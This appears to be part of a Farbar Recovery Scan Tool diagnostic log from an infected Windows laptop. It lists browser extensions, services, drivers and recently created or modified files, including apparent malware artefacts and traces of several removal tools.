CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation)
S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc)
S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.)
S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt
2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt
2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill
2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt
2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt
2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt
2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner
2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk
2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk
2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam
2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray
2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent
2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job
2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics
2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV
2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage]
2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav
2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe
2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe
2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser
2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt
2019-02-12 05:53 - 2019-02-17 12:44 - 000000000 ____D C:\Users\Stanley\Downloads\FRST
2019-02-12 05:33 - 2019-02-17 12:44 - 000000000 ____D C:\FRST
2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk
2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500
2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator
2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss
2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk
2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold##
2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk
2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media
2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe
2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt
2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft
2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft
2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files
2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe
2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe
2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI
2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions
2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog
2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe
2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio
2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe
2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery
2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni
2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment
2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0
2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA
2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe
2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios
2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple
2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg
2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg
2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004
2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer
2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry
2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages
2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold
2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf
2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf
2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive
2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf
2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf
2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf
2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip
2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf
2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk
2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod
2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes
2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx
2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx
2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt
2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt
2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip
2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition
2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP
2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-17 12:47 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent
2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc
2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001
2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-16 09:05 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive
2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache
2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db
2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700
2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera
2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search
2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db
2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp
